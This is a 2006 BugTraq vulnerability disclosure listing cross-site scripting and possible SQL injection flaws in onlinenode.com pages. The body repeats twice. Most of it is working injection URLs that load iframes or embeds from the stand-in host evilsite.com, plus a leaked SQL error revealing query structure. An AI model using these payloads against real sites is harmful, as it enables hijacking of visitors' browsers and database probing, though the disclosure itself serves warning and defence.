BugTraq
Back to list
|
Post reply
Onlinenode.com - XSS
Jun 11 2006 12:11AM
luny youfucktard com
Onlinenode.com
Homepage:
http://www.onlinenode.com
Effected files:
node_category.php
node_article.php
webpage.php
guestbook.php
journal.php
pictures.php
chatroom.php
---------------------------
XSS Vuln via node_category.php:
One way to archive this is to use black tags with an open ended iframe tag:
http://www.onlinenode.com/node_category.php?forms_action=node_category&f
orms_id_category=1">'>"<iframe%20src=http://evilsite.com/scriptlet.html%
20<
Another way would be to use <embed> tags, since using flash could also create a XSS attack:
http://www.onlinenode.com/node_category.php?forms_action=node_category&f
orms_id_category=1''"<"'><EMBED%20src=http://www.evilsite.com/badflash.s
wf></embed><'<"">
--------------------------------------------
XSS Vuln via node_article.php:
One way to archive this is to use black tags with an open ended iframe tag:
http://www.onlinenode.com/node_article.php?forms_action=node_article&for
ms_id_article=158391149699301''"<"'><iframe%20src=http://evilsite.com/sc
riptlet.html%20<
Another way would be to use <embed> tags, since using flash could also create a XSS attack:
http://www.onlinenode.com/node_article.php?forms_action=node_article&for
ms_id_article=158391149699301''"<"'><EMBED%20src=http://www.evilsite.com
/badflash.swf></embed><'<"">
-------------------------------------------
Possible SQL injection due to with query error:
http://www.onlinenode.com/webpage.php?forms_action=webpage&forms_id_user
=19'
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use
near '127.0.0.1' AND host != 'adsl-127-0-0.lol.somehost.com'' >>> UPDATE counter SET ip = '127.0.0.1',host = 'adsl-127-0-0.lol.
somehost.com',count = count + 1 WHERE id_user = '19'' AND ip != '127.0.0.1' AND host != 'dsl-127-0-0.lol.somehost.com'
We can see from the above query, a few table names as well as our IP + hostmask.
XSS Vuln in webpage.php:
http://www.onlinenode.com/webpage.php?forms_action=webpage&forms_id_user
=2">'><iframe%20src=http://evilsite.com/scriptlet.html <
Again, same as above the <embed> tags also work for flash.
------------------------------------------
XSS Vulnerability via guestbook.php:
http://www.onlinenode.com/guestbook.php?forms_action=guestbook1&forms_id
_user=18">'><iframe%20src=http://evilsite.com/scriptlet.html%20<
Again, same as above the <embed> tags also work for flash.
-----------------------------------------
XSS Vulnerability via journal.php:
http://www.onlinenode.com/journal.php?forms_action=journal&forms_id_user
=">'><iframe%20src=http://evilsite.com/scriptlet.html%20<
Again, same as above the <embed> tags also work for flash.
---------------------------------------
XSS Vuln via pictures.php:
http://www.onlinenode.com/pictures.php?forms_action=pictures&forms_id_us
er=">'><iframe%20src=http://evilsite.com/scriptlet.html%20<
Again, same as above the <embed> tags also work for flash.
----------------------------------------
XSS Vuln via mb_thread.php when viewing threads:
http://www.onlinenode.com/mb_thread.php?forms_action=mb_thread1&forms_id
_thread=0">'><iframe%20src=http://evilsite.com/scriptlet.html%20<
Again, same as above the <embed> tags also work for flash.
-------------------------------------
XSS Vuln via chatroom.php:
http://www.onlinenode.com/chatroom.php?forms_action=chatroom_main&forms_
room=">'><iframe%20src=http://evilsite.com/scriptlet.html%20<&button.x=2
4&button.y=14
Again, <embed> tags work here too.
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Homepage:
http://www.onlinenode.com
Effected files:
node_category.php
node_article.php
webpage.php
guestbook.php
journal.php
pictures.php
chatroom.php
---------------------------
XSS Vuln via node_category.php:
One way to archive this is to use black tags with an open ended iframe tag:
http://www.onlinenode.com/node_category.php?forms_action=node_category&f
orms_id_category=1">'>"<iframe%20src=http://evilsite.com/scriptlet.html%
20<
Another way would be to use <embed> tags, since using flash could also create a XSS attack:
http://www.onlinenode.com/node_category.php?forms_action=node_category&f
orms_id_category=1''"<"'><EMBED%20src=http://www.evilsite.com/badflash.s
wf></embed><'<"">
--------------------------------------------
XSS Vuln via node_article.php:
One way to archive this is to use black tags with an open ended iframe tag:
http://www.onlinenode.com/node_article.php?forms_action=node_article&for
ms_id_article=158391149699301''"<"'><iframe%20src=http://evilsite.com/sc
riptlet.html%20<
Another way would be to use <embed> tags, since using flash could also create a XSS attack:
http://www.onlinenode.com/node_article.php?forms_action=node_article&for
ms_id_article=158391149699301''"<"'><EMBED%20src=http://www.evilsite.com
/badflash.swf></embed><'<"">
-------------------------------------------
Possible SQL injection due to with query error:
http://www.onlinenode.com/webpage.php?forms_action=webpage&forms_id_user
=19'
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use
near '127.0.0.1' AND host != 'adsl-127-0-0.lol.somehost.com'' >>> UPDATE counter SET ip = '127.0.0.1',host = 'adsl-127-0-0.lol.
somehost.com',count = count + 1 WHERE id_user = '19'' AND ip != '127.0.0.1' AND host != 'dsl-127-0-0.lol.somehost.com'
We can see from the above query, a few table names as well as our IP + hostmask.
XSS Vuln in webpage.php:
http://www.onlinenode.com/webpage.php?forms_action=webpage&forms_id_user
=2">'><iframe%20src=http://evilsite.com/scriptlet.html <
Again, same as above the <embed> tags also work for flash.
------------------------------------------
XSS Vulnerability via guestbook.php:
http://www.onlinenode.com/guestbook.php?forms_action=guestbook1&forms_id
_user=18">'><iframe%20src=http://evilsite.com/scriptlet.html%20<
Again, same as above the <embed> tags also work for flash.
-----------------------------------------
XSS Vulnerability via journal.php:
http://www.onlinenode.com/journal.php?forms_action=journal&forms_id_user
=">'><iframe%20src=http://evilsite.com/scriptlet.html%20<
Again, same as above the <embed> tags also work for flash.
---------------------------------------
XSS Vuln via pictures.php:
http://www.onlinenode.com/pictures.php?forms_action=pictures&forms_id_us
er=">'><iframe%20src=http://evilsite.com/scriptlet.html%20<
Again, same as above the <embed> tags also work for flash.
----------------------------------------
XSS Vuln via mb_thread.php when viewing threads:
http://www.onlinenode.com/mb_thread.php?forms_action=mb_thread1&forms_id
_thread=0">'><iframe%20src=http://evilsite.com/scriptlet.html%20<
Again, same as above the <embed> tags also work for flash.
-------------------------------------
XSS Vuln via chatroom.php:
http://www.onlinenode.com/chatroom.php?forms_action=chatroom_main&forms_
room=">'><iframe%20src=http://evilsite.com/scriptlet.html%20<&button.x=2
4&button.y=14
Again, <embed> tags work here too.
[ reply ]